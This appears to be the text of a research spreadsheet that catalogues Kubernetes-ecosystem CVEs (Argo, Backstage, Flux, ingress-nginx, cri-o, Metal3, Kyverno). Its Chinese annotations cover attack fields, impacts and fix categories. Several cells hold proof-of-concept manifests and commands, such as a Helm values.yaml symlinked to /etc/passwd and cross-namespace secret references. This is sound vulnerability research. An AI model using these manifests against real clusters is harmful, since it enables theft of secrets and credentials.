    <t>Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. In affected versions an attacker can create a workflow which produces a HTML artifact containing an HTML file that contains a script which uses XHR calls to interact with the Argo Server API. The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running. As the script has access to the Argo Server API (as the victim), so may read information about the victim’s workflows, or create and delete workflows. Note the attacker must be an insider: they must have access to the same cluster as the victim and must already be able to run their own workflows. The attacker must have an understanding of the victim’s system. We have seen no evidence of this in the wild. We urge all users to upgrade to the fixed versions.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: argoproj.io/v1alpha1
kind: Workflow
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
     </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> command: ["sh", "-c", "echo '&lt;script&gt;恶意API调用代码&lt;/script&gt;' &gt; /tmp/attack.html"]</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    outputs:
      artifacts:
      - name: malicious-html
       </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> path: /tmp/attack.html  # 注入恶意HTML文件路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
        s3:
          key: attack.html      # 存储路径可控字段</t>
    </r>
  </si>
  <si>
    <t>与
两个字段配合使用：
1. container.commadnd 命令执行
2. outputs:
  artifacts: 指定文件路径(内外字段配合）</t>
  </si>
  <si>
    <t>内外配合使用</t>
  </si>
  <si>
    <t>Workflow</t>
  </si>
  <si>
    <t>两个字段需要配合一起使用</t>
  </si>
  <si>
    <t>RPC-XMLHttpRequest (XHR) 调用 Argo Server API</t>
  </si>
  <si>
    <t>浏览器解析并执行内联脚本</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v1.3.0 are vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive YAML files from Argo CD's repo-server. A malicious Argo CD user with write access for a repository which is (or may be) used in a Helm-type Application may commit a symlink which points to an out-of-bounds file. If the target file is a valid YAML file, the attacker can read the contents of that file. Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any YAML-formatted secrets which have been mounted as files on the repo-server. Patches for this vulnerability has been released in the following Argo CD versions: v2.4.1, v2.3.5, v2.2.10 and v2.1.16. If you are using a version &gt;=v2.3.0 and do not have any Helm-type Applications you may disable the Helm config management tool as a workaround.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. 恶意 Helm Chart 结构
假设攻击者在 Git 仓库中提交如下结构的 Helm Chart：
bash
# 仓库目录结构
malicious-chart/
├── Chart.yaml          # Helm Chart 元数据
└── values.yaml -&gt; /etc/passwd  # 符号链接指向敏感文件
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Chart.yaml
yaml
apiVersion: v2
name: malicious-chart
description: A Helm chart to exploit path traversal
type: application
version: 0.1.0
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>values.yaml（符号链接）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
bash
# 在本地创建符号链接（需提交到 Git 仓库）
ln -s /etc/passwd malicious-chart/values.yaml
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2. Argo CD Application 资源配置
攻击者通过以下 Application 资源触发漏洞：
yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: vulnerable-helm-app
  namespace: argocd
spec:
  project: default
  source:
   </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> repoURL: https://github.com/attacker/malicious-repo.git  # 恶意仓库地址
    path: malicious-chart                                   # 指向恶意 Chart 的路径
    targetRevision: HEAD                                    # 使用最新提交
    helm:
      valueFiles:
        - values.yaml  # 显式指定加载 values.yaml（符号链接）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  destination:
    server: https://kubernetes.default.svc
    namespace: default
具体攻击流程示例分析：
结合repo-server的单体文件结构特征（所有应用的源码统一存储在类似/tmp/repo的目录下），攻击者可通过以下步骤完成攻击16：
提交包含恶意路径的Helm Chart（如values.yaml: /var/run/secrets/kubernetes.io/serviceaccount/token）。
利用url.ParseRequestURI()的误判，使该路径被标记为"合法URI"。
绕过EnforceToCurrentRoot()校验，直接读取目标敏感文件。
通过Argo CD API或UI泄露文件内容。</t>
    </r>
  </si>
  <si>
    <t>与</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>RPC</t>
  </si>
  <si>
    <t>文件I/O</t>
  </si>
  <si>
    <t>Argo CD is a declarative continuous deployment for Kubernetes. Argo CD versions v0.7.0 and later are vulnerable to an uncontrolled memory consumption bug, allowing an authorized malicious user to crash the repo-server service, resulting in a Denial of Service. The attacker must be an authenticated Argo CD user authorized to deploy Applications from a repository which contains (or can be made to contain) a large file. The fix for this vulnerability is available in versions 2.3.5, 2.2.10, 2.1.16, and later. There are no known workarounds. Users are recommended to upgrade.</t>
  </si>
  <si>
    <t>模版注入-&gt; 命令执行</t>
  </si>
  <si>
    <t>The package github.com/argoproj/argo-events/sensors/artifacts before 1.7.1 are vulnerable to Directory Traversal in the (g *GitArtifactReader).Read() API in git.go. This could allow arbitrary file reads if the GitArtifactReader is provided a pathname containing a symbolic link or an implicit directory name such as ...</t>
  </si>
  <si>
    <t>Sensor</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have `applications, create` or `applications, update` RBAC access to reach the code which may produce the error. The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. If the user has `repositories, update` access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway. A patch for this vulnerability has been released in version 2.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">**攻击利用方式**：  
   - 攻击者提交包含非法仓库URL的`Application`配置，例如：  
     ```yaml
     apiVersion: argoproj.io/v1alpha1
     kind: Application
     spec:
       source:
        </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> repoURL: "https://invalid-repo.example.com"  # 故意配置错误URL</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
         targetRevision: HEAD
         credentials:  # 关联敏感凭据
           username: admin
           password: s3cret
     ```
   - 通过高频API请求触发仓库连接错误，从错误日志/UI响应中提取明文凭据</t>
    </r>
  </si>
  <si>
    <t>格式化输出</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a `javascript:` link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin). The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources. A patch for this vulnerability has been released in the following Argo CD versions: v2.4.1, v2.3.5, v2.2.10 and v2.1.16. There are no completely-safe workarounds besides upgrading.</t>
  </si>
  <si>
    <t>deployment</t>
  </si>
  <si>
    <t>外部URL-&gt; 使用JavaScript伪协议替代正常的HTTP(S) URL</t>
  </si>
  <si>
    <t>@backstage/plugin-scaffolder-backend is the backend for the default Backstage software templates. In affected versions a malicious actor with write access to a registered scaffolder template is able to manipulate the template in a way that writes files to arbitrary paths on the scaffolder-backend host instance. This vulnerability can in some situation also be exploited through user input when executing a template, meaning you do not need write access to the templates. This method will not allow the attacker to control the contents of the injected file however, unless the template is also crafted in a specific way that gives control of the file contents. This vulnerability is fixed in version `0.15.14` of the `@backstage/plugin-scaffolder-backend`. This attack is mitigated by restricting access and requiring reviews when registering or modifying scaffolder templates.</t>
  </si>
  <si>
    <t>template crd+location crd</t>
  </si>
  <si>
    <t>Backstage is an open platform for building developer portals. The Backstage scaffolder-backend plugin uses a templating library that requires sandbox, as it by design allows for code injection. The library used for this sandbox so far has been `vm2`, but in light of several past vulnerabilities and existing vulnerabilities  that may not have a fix, the plugin has switched to using a different sandbox library. A malicious actor with write access to a registered scaffolder template could manipulate the template in a way that allows for remote code execution on the scaffolder-backend instance. This was only exploitable in the template YAML definition itself and not by user input data. This is vulnerability is fixed in version 1.15.0 of `@backstage/plugin-scaffolder-backend`.</t>
  </si>
  <si>
    <t>Template</t>
  </si>
  <si>
    <t>Backstage is an open platform for building developer portals. In affected versions A malicious actor could read sensitive files from the environment where Scaffolder Tasks are run. The attack is executed by crafting a custom Scaffolder template with a `github:publish:pull-request` action and a particular source path. When the template is executed the sensitive files would be included in the published pull request. This vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request. The vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`.</t>
  </si>
  <si>
    <t>RPC-http</t>
  </si>
  <si>
    <t>kustomize-controller is a Kubernetes operator, specialized in running continuous delivery pipelines for infrastructure and workloads defined with Kubernetes manifests and assembled with Kustomize. Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges. In affected versions multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue. This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image. To prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.</t>
  </si>
  <si>
    <t>**攻击利用方式**：  
   - 创建包含恶意Shell脚本的`Secret`，利用serviceaccount 引用最终关联到`Kustomization`资源。
   - `kustomize-controller`在处理时执行脚本，利用其高权限ServiceAccount（如`cluster-admin`）执行`kubectl`命令。</t>
  </si>
  <si>
    <t>涉及多个资源，字段需要在多个资源之间传递</t>
  </si>
  <si>
    <t>多资源配合-资源之间存在引用</t>
  </si>
  <si>
    <t>secret, serviceaccount, Kustomization</t>
  </si>
  <si>
    <t>CRD
内置资源</t>
  </si>
  <si>
    <t>配置资源、安全与认证资源</t>
  </si>
  <si>
    <t>资源引用</t>
  </si>
  <si>
    <t>功能一致（时间戳类型）</t>
  </si>
  <si>
    <t xml:space="preserve"> GitRepository</t>
  </si>
  <si>
    <t>时间间隔字段</t>
  </si>
  <si>
    <t>资源字段解析</t>
  </si>
  <si>
    <t>功能不一致但触发位置一致</t>
  </si>
  <si>
    <t>HelmRelease</t>
  </si>
  <si>
    <t>（helm sdk解析处理数据）</t>
  </si>
  <si>
    <t>Kustomization</t>
  </si>
  <si>
    <t>与
特定的配置字段和特定的资源字段需要结合起来使用（内外字段一起配合使用）</t>
  </si>
  <si>
    <t>CVE-2022-24817（类似CVE-2021-41254)【非常典型的多crd引用同一内置资源的示例】</t>
  </si>
  <si>
    <t>或
与</t>
  </si>
  <si>
    <t xml:space="preserve">功能相同（存在相同的引用关系）
</t>
  </si>
  <si>
    <t>多个资源配合起来使用-&gt; 资源之间存在引用关系</t>
  </si>
  <si>
    <t>Kustomization` and `HelmRelease` objects.</t>
  </si>
  <si>
    <t>A vulnerability was found in cri-o. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.</t>
  </si>
  <si>
    <t>通过pod.container.env可注入恶意字段</t>
  </si>
  <si>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</si>
  <si>
    <t>Provider</t>
  </si>
  <si>
    <t>URL-外部资源引用</t>
  </si>
  <si>
    <t>Composition</t>
  </si>
  <si>
    <t>The Bare Metal Operator (BMO) implements a Kubernetes API for managing bare metal hosts in Metal3. The `BareMetalHost` (BMH) CRD allows the `userData`, `metaData`, and `networkData` for the provisioned host to be specified as links to Kubernetes Secrets. There are fields for both the `Name` and `Namespace` of the Secret, meaning that versions of the baremetal-operator prior to 0.8.0, 0.6.2, and 0.5.2 will read a `Secret` from any namespace. A user with access to create or edit a `BareMetalHost` can thus exfiltrate a `Secret` from another namespace by using it as e.g. the `userData` for provisioning some host (note that this need not be a real host, it could be a VM somewhere). BMO will only read a key with the name `value` (or `userData`, `metaData`, or `networkData`), so that limits the exposure somewhat. `value` is probably a pretty common key though. Secrets used by _other_ `BareMetalHost`s in different namespaces are always vulnerable. It is probably relatively unusual for anyone other than cluster administrators to have RBAC access to create/edit a `BareMetalHost`. This vulnerability is only meaningful, if the cluster has users other than administrators and users' privileges are limited to their respective namespaces. The patch prevents BMO from accepting links to Secrets from other namespaces as BMH input. Any BMH configuration is only read from the same namespace only. The problem is patched in BMO releases v0.7.0, v0.6.2 and v0.5.2 and users should upgrade to those versions. Prior upgrading, duplicate the BMC Secrets to the namespace where the corresponding BMH is. After upgrade, remove the old Secrets. As a workaround, an operator can configure BMO RBAC to be namespace scoped for Secrets, instead of cluster scoped, to prevent BMO from accessing Secrets from other namespaces.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: metal3.io/v1alpha1
   kind: BareMetalHost
   metadata:
     name: malicious-host
   spec:
     userData:
       </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>name: victim-secret   # 跨命名空间Secret名称
       namespace: kube-system # 攻击者指定其他命名空间</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
     metaData:
       name: victim-secret
       namespace: kube-system
     networkData:
       name: victim-secret
       namespace: kube-system</t>
    </r>
  </si>
  <si>
    <t>与
多个字段配合使用
需要同时指定：
 name: victim-secret   # 跨命名空间Secret名称
       namespace: kube-system # 攻击者指定其他命名空间</t>
  </si>
  <si>
    <t>字段在单个资源，需要同时指定2个字段进行注入</t>
  </si>
  <si>
    <t>BareMetalHost</t>
  </si>
  <si>
    <t>K8s资源引用，需要同时指定UserData.name和namespace</t>
  </si>
  <si>
    <t>bare meta op-&gt; k8s api-server</t>
  </si>
  <si>
    <t>Kyverno is a policy engine designed for Kubernetes. A kyverno ClusterPolicy, ie. "disallow-privileged-containers," can be overridden by the creation of a PolicyException in a random namespace. By design, PolicyExceptions are consumed from any namespace. Administrators may not recognize that this allows users with privileges to non-kyverno namespaces to create exceptions. This vulnerability is fixed in 1.13.0.</t>
  </si>
  <si>
    <t>与（涉及多个资源）</t>
  </si>
  <si>
    <t>多资源配合-资源之间相互影响</t>
  </si>
  <si>
    <t xml:space="preserve">ClusterPolicy
PolicyExceptions </t>
  </si>
  <si>
    <t>MaliciousEC2Instance</t>
  </si>
  <si>
    <t>A security issue was discovered in  ingress-nginx https://github.com/kubernetes/ingress-nginx  where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)</t>
  </si>
  <si>
    <t>A security issue was discovered in  ingress-nginx https://github.com/kubernetes/ingress-nginx  where the `mirror-target` and `mirror-host` Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)</t>
  </si>
  <si>
    <t>A security issue was discovered in  ingress-nginx https://github.com/kubernetes/ingress-nginx  where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)</t>
  </si>
  <si>
    <t>A security issue was discovered in  ingress-nginx https://github.com/kubernetes/ingress-nginx  where attacker-provided data are included in a filename by the ingress-nginx Admission Controller feature, resulting in directory traversal within the container. This could result in denial of service, or when combined with other vulnerabilities, limited disclosure of Secret objects from the cluster.</t>
  </si>
  <si>
    <t>潜在影响</t>
  </si>
  <si>
    <t>细分类别</t>
  </si>
  <si>
    <t>是否可以进一步横向移动提升至管理员权限</t>
  </si>
  <si>
    <t>攻击所跨的信任域</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - 集群内所有Secret泄露（包括TLS证书、数据库凭据等）  
   - 权限提升至集群管理员（若凭据有更高权限）</t>
  </si>
  <si>
    <t>可进一步横向移动</t>
  </si>
  <si>
    <t>通过高权限的sa token 进一步横向移动提升至管理员权限</t>
  </si>
  <si>
    <t>可通过横向移动进一步提升至管理员权限</t>
  </si>
  <si>
    <t>数据面（Pod/容器） → 控制面</t>
  </si>
  <si>
    <t>**潜在安全影响**  
   - 绕过Ingress路径规则限制，访问未授权后端服务，导致数据泄露或服务端请求伪造（SSRF）。</t>
  </si>
  <si>
    <t>可提升至管理员权限</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - 获取`ingress-nginx`服务账号凭证（默认拥有集群所有Secret读取权限），导致敏感数据（如数据库密码）泄露。</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - 在Ingress控制器Pod内执行任意命令（如反弹Shell、窃取Secret），导致集群权限提升或数据泄露（CVSS `C:H/I:L/A:L`）。</t>
  </si>
  <si>
    <t>**潜在影响**  
- 通过Nginx配置篡改实现横向移动、数据泄露或拒绝服务  
- 最终效果取决于注入内容（例如重定向到钓鱼网站、窃取Cookie）</t>
  </si>
  <si>
    <t>**潜在影响**：获取`ingress-nginx`控制器权限（默认拥有所有Secret读取权限），导致**集群内Secrets全量泄露**。</t>
  </si>
  <si>
    <t>**安全影响**：  
   - 最终获得集群内所有Secret的读取权限  
   - 可横向移动至其他敏感资源（如kube-system命名空间）  
   - CVSS 7.6反映网络攻击路径+高机密性影响（C:H）</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - 集群内Secret完全泄露，导致凭证、密钥等敏感数据被盗  
   - 可能接管整个集群（通过高权限ServiceAccount）</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - 权限提升至集群内Pod创建权限，可能导致横向移动、数据泄露或拒绝服务。</t>
  </si>
  <si>
    <t>读写无权读写的K8s资源（RBAC绕过）</t>
  </si>
  <si>
    <t>否-&gt; 可创建特权Pod</t>
  </si>
  <si>
    <t>集群范围内的权限提升
可提升至管理员权限</t>
  </si>
  <si>
    <t>控制面-&gt; 数据面</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - 宿主机的任意命令执行（CWE-77命令注入）  
   - 集群控制平面或节点完全沦陷（CVSS 7.2高权限环境下的横向移动）</t>
  </si>
  <si>
    <t>container breakout-修改Linux系统底层属性</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - 节点不可用（内存/磁盘资源耗尽），可能引发Pod驱逐和集群级服务中断。  
   - 最终效果：拒绝服务（DoS），影响系统可用性（CVSS A:H）。</t>
  </si>
  <si>
    <t>消耗资源</t>
  </si>
  <si>
    <t>**安全影响**：宿主机root权限代码执行，完全控制节点，可能横向渗透整个集群。</t>
  </si>
  <si>
    <t>container breakout-容器逃逸</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - 容器逃逸（若juicefs容器挂载主机路径）  
   - 数据窃取/篡改（通过注入命令访问PV数据）  
   - 横向移动（获取集群内敏感凭据）</t>
  </si>
  <si>
    <t>任意命令执行</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - 节点级内存耗尽导致容器运行时崩溃，引发Pod驱逐  
   - 拒绝服务（DoS），影响节点上其他工作负载</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - 绕过网络隔离，允许未授权流量（如跨namespace通信、敏感服务访问）  
   - 违反零信任网络模型，可能导致横向移动或数据泄露</t>
  </si>
  <si>
    <t>绕过网络安全策略</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - **DoS**：远程关闭Envoy实例导致流量中断。  
   - **信息泄露**：暴露Secret元数据（如TLS证书存在性）。  
   - **CVSS 8.5**：高可用性影响（A:H）和机密性影响（C:L）。</t>
  </si>
  <si>
    <t>集群外部-&gt; 内部</t>
  </si>
  <si>
    <t>**安全影响**：  
   - 宿主机文件泄露（如K8s secrets、SSH密钥）  
   - 权限提升至宿主机或集群控制平面</t>
  </si>
  <si>
    <t>container breakout-读写没有权限的文件</t>
  </si>
  <si>
    <t xml:space="preserve">单节点
</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - 宿主机文件系统完全暴露（C:H/I:H/A:H）  
   - 集群控制平面凭证泄露风险  
   - 可能实现集群横向移动或持久化后门</t>
  </si>
  <si>
    <t>**对Kubernetes集群的潜在安全影响**  
- 横向移动：通过受害者的高权限账户操作集群资源  
- 数据泄露：窃取工作流中的敏感数据（如环境变量、Secret引用）  
- 拒绝服务：批量删除关键工作流任务</t>
  </si>
  <si>
    <t>xss+csrf</t>
  </si>
  <si>
    <t>控制平面组件间</t>
  </si>
  <si>
    <t>**潜在安全影响**  
   - 敏感数据泄露（如其他应用的Secrets、ConfigMap）  
   - 横向渗透（利用泄露凭证访问其他资源）  
   - 利用效果：信息泄露（CVSS 4.3，低危），不影响集群控制平面。</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - `repo-server`服务拒绝服务，中断持续部署流程。  
   - 影响集群应用更新和同步能力，但不会直接破坏Kubernetes控制平面。</t>
  </si>
  <si>
    <t>**安全影响**：  
   - 横向穿透：访问其他Application的解密配置  
   - 凭证泄露：获取挂载到repo-server的ServiceAccount token</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - 工作流中断（CIA三元组中的可用性破坏）  
   - 通过表达式逃逸实现集群内横向移动（如挂载ServiceAccount token）</t>
  </si>
  <si>
    <t>**潜在影响**:
   - 集群CA证书泄露 → 中间人攻击集群组件
   - 窃取Pod挂载的Secret → 横向移动
   - 读取节点系统文件 → 容器逃逸基础</t>
  </si>
  <si>
    <t>潜在影响：  
- 集群管理员凭证泄露  
- 跨namespace的敏感配置窃取  
- 通过service account token进行横向移动</t>
  </si>
  <si>
    <t>基于泄露的信息可进一步 在集群内横向移动</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - 集群管理员凭据（admin.conf）、其他应用的Git凭证、服务账户Token等敏感数据泄露  
   - 横向移动到其他集群或劫持Argo CD控制流</t>
  </si>
  <si>
    <t>**安全影响**：  
   - 泄露私有Git仓库凭据，可能导致供应链攻击或代码泄露  
   - 最终利用效果：攻击者获得敏感凭证并横向渗透到代码仓库/镜像仓库</t>
  </si>
  <si>
    <t>**潜在安全影响**  
   - **最终效果**：攻击者可完全控制集群（若受害者有admin权限），导致数据泄露、服务中断或资源劫持。  
   - **CVSS分析**：基于CVSS 9.0（AV:N/UI:R/S:C），漏洞可通过网络低权限触发，影响范围跨安全域。</t>
  </si>
  <si>
    <t>**对Kubernetes集群的潜在影响**：  
   - 若攻击者写入kubelet配置文件、CNI插件配置或ServiceAccount token文件，可能导致容器逃逸、网络策略绕过或权限提升  
   - 最终效果取决于写入文件的类型，可能达到集群级控制（CVSS影响范围标记为"S:C"）</t>
  </si>
  <si>
    <t>0的Kubernetes集群（若Backstage部署在集群内）。攻击者需有模板写入权限。</t>
  </si>
  <si>
    <t>**对Kubernetes集群的影响**  
   若Backstage Task运行在Pod中且挂载了Kubernetes Secret，攻击者可窃取敏感凭据，进而横向移动攻击集群。最终效果取决于泄露的文件内容（如ServiceAccount Token、kubeconfig文件等）。</t>
  </si>
  <si>
    <t>信息泄露-&gt; 权限提升</t>
  </si>
  <si>
    <t>**潜在影响**：  
   攻击者获得集群管理员权限，可部署恶意Pod、窃取数据、横向移动。</t>
  </si>
  <si>
    <t>0的集群，导致特定资源类型处理中断。</t>
  </si>
  <si>
    <t>解析错误导致控制器组件崩溃</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - **横向拒绝服务**：阻断所有租户的Helm发布流程  
   - **集群稳定性破坏**：控制器频繁崩溃导致控制平面不可用</t>
  </si>
  <si>
    <t>**潜在安全影响**  
- **集群级权限泄露**：获取ServiceAccount Token或kubeconfig文件  
- **横向移动**：通过窃取凭据控制其他Pod/节点  
- **供应链攻击**：污染CI/CD流程生成恶意镜像/配置</t>
  </si>
  <si>
    <t>**潜在安全影响**  
- 控制器级拒绝服务（无法同步其他Kustomization配置）  
- 中断GitOps流程，导致应用部署停滞</t>
  </si>
  <si>
    <t>**安全影响**：  
   - 容器逃逸（通过挂载主机路径或特权容器）  
   - 横向移动至其他命名空间/节点  
   - 最终效果：集群管理员权限获取（若控制器具备高权限）</t>
  </si>
  <si>
    <t>**潜在安全影响**  
   容器提权（通过添加特权用户）、持久化后门、横向移动（利用被篡改的passwd文件绕过认证）。</t>
  </si>
  <si>
    <t>**潜在安全影响**：  
   - Crossplane控制器暂时不可用，影响其管理的所有资源（如云服务编排）。  
   - 需手动重启控制器或依赖Kubernetes的自愈机制（如Deployment重启策略）。</t>
  </si>
  <si>
    <t>**潜在安全影响/利用效果**：  
   - **影响**：拒绝服务（DoS），导致目标Pod因内存耗尽崩溃。  
   - **利用效果**：破坏依赖该Pod的业务服务可用性。</t>
  </si>
  <si>
    <t>**潜在安全影响**  
   - 敏感数据（如云凭据、SSH密钥）被非授权用户窃取。  
   - 破坏命名空间隔离性，导致横向渗透。</t>
  </si>
  <si>
    <t>cross-namespace</t>
  </si>
  <si>
    <t>是（跨命名空间的字段引用）</t>
  </si>
  <si>
    <t>多租户间的隔离</t>
  </si>
  <si>
    <t>Patched versions
1.13.0
https://github.com/kyverno/kyverno/pull/9645</t>
  </si>
  <si>
    <t>**潜在安全影响与利用效果**  
   - 特权容器逃逸策略管控，导致容器权限提升风险  
   - 最终效果：违反集群安全基线（如运行恶意特权容器）</t>
  </si>
  <si>
    <t>是（最终可以注入恶意的pod配置）</t>
  </si>
  <si>
    <t>**潜在影响**: 集群内服务身份被伪造，导致横向移动、数据窃取或权限提升（如服务账户劫持）。</t>
  </si>
  <si>
    <t>others</t>
  </si>
  <si>
    <t>**安全影响**  
- **横向移动**：控制ingress-nginx Pod后渗透集群网络  
- **数据泄露**：获取所有Namespace的Secret（如数据库凭据、TLS证书等）  
- **持久化**：在nginx配置中植入后门</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - **横向移动**: 通过控制器权限访问其他Namespace资源。  
   - **数据泄露**: 窃取集群全局Secrets（如docker-registry、TLS证书）。  
   - **RCE**: 在控制器Pod中执行任意代码（若NGINX配置触发命令执行）。</t>
  </si>
  <si>
    <t>**潜在影响**：  
   - **横向移动**：通过控制器Pod权限访问集群内所有Secret（如kubelet凭证）。  
   - **持久化**：在控制器容器中植入后门，劫持流量或篡改服务配置。</t>
  </si>
  <si>
    <t>**潜在影响**:  
   - 容器文件系统破坏导致DoS  
   - 结合其他漏洞可能泄露Secret（通过路径穿越读取`/var/run/secrets/kubernetes.io`）</t>
  </si>
  <si>
    <t>原因细分类别-1</t>
  </si>
  <si>
    <t>原因细分类别-2</t>
  </si>
  <si>
    <t>修复位置（ 最终用于统计的数据-新）</t>
  </si>
  <si>
    <t>修复位置（ 最终用于统计的数据-原）</t>
  </si>
  <si>
    <t>准入控制器修复特征</t>
  </si>
  <si>
    <t>资源控制协调过程相关的修复特征</t>
  </si>
  <si>
    <t>缓解措施</t>
  </si>
  <si>
    <t>修复策略</t>
  </si>
  <si>
    <t>修复策略细分</t>
  </si>
  <si>
    <t xml:space="preserve">资源控制器
准入控制器
</t>
  </si>
  <si>
